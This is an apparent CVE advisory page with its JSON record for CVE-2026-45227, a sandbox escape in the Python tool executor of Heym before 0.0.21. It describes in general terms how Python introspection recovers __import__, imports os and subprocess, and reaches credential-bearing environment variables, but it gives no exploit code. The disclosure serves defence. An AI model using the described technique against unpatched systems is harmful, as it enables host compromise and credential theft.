Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.
PUBLISHED5.2CWE-693x_open-source
Heym < 0.0.21 Sandbox Escape via Python Introspection
Problem type
Affected products
heymrun
heym
< 0.0.21 - AFFECTED
32b7e809d987d9b018ec8daa2cdaf48f627f26f1 - UNAFFECTED
References
github.com
https://github.com/heymrun/heym/releases/tag/v0.0.21
github.com
https://github.com/heymrun/heym/pull/94
github.com
https://github.com/heymrun/heym/commit/32b7e809d987d9b018ec8daa2cdaf48f627f26f1
vulncheck.com
https://www.vulncheck.com/advisories/heym-sandbox-escape-via-python-introspection
GitHub Security Advisories
GHSA-vhhj-j98h-xx8p
Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor...
https://github.com/advisories/GHSA-vhhj-j98h-xx8pHeym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted import function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.
nvd.nist.gov
https://nvd.nist.gov/vuln/detail/CVE-2026-45227
github.com
https://github.com/heymrun/heym/pull/94
github.com
https://github.com/heymrun/heym/commit/32b7e809d987d9b018ec8daa2cdaf48f627f26f1
github.com
https://github.com/heymrun/heym/releases/tag/v0.0.21
vulncheck.com
https://www.vulncheck.com/advisories/heym-sandbox-escape-via-python-introspection
github.com
https://github.com/advisories/GHSA-vhhj-j98h-xx8p
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-45227Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-45227",
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"dateUpdated": "2026-05-12T21:18:34.901Z",
"dateReserved": "2026-05-11T14:14:49.611Z",
"datePublished": "2026-05-12T21:18:34.901Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck",
"dateUpdated": "2026-05-12T21:18:34.901Z"
},
"datePublic": "2026-05-09T00:00:00.000Z",
"title": "Heym < 0.0.21 Sandbox Escape via Python Introspection",
"descriptions": [
{
"lang": "en",
"value": "Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user."
}
],
"affected": [
{
"vendor": "heymrun",
"product": "heym",
"repo": "https://github.com/heymrun/heym",
"defaultStatus": "affected",
"versions": [
{
"version": "0",
"status": "affected",
"versionType": "semver",
"lessThan": "0.0.21"
},
{
"version": "32b7e809d987d9b018ec8daa2cdaf48f627f26f1",
"status": "unaffected",
"versionType": "git"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "Protection Mechanism Failure",
"cweId": "CWE-693",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/heymrun/heym/releases/tag/v0.0.21",
"tags": [
"release-notes"
]
},
{
"url": "https://github.com/heymrun/heym/pull/94",
"tags": [
"issue-tracking"
]
},
{
"url": "https://github.com/heymrun/heym/commit/32b7e809d987d9b018ec8daa2cdaf48f627f26f1",
"tags": [
"patch"
]
},
{
"url": "https://www.vulncheck.com/advisories/heym-sandbox-escape-via-python-introspection",
"tags": [
"third-party-advisory"
]
}
],
"metrics": [
{
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
],
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
}
}
],
"credits": [
{
"lang": "en",
"value": "Chia Min Jun Lennon",
"type": "finder"
}
],
"tags": [
"x_open-source"
]
}
}
}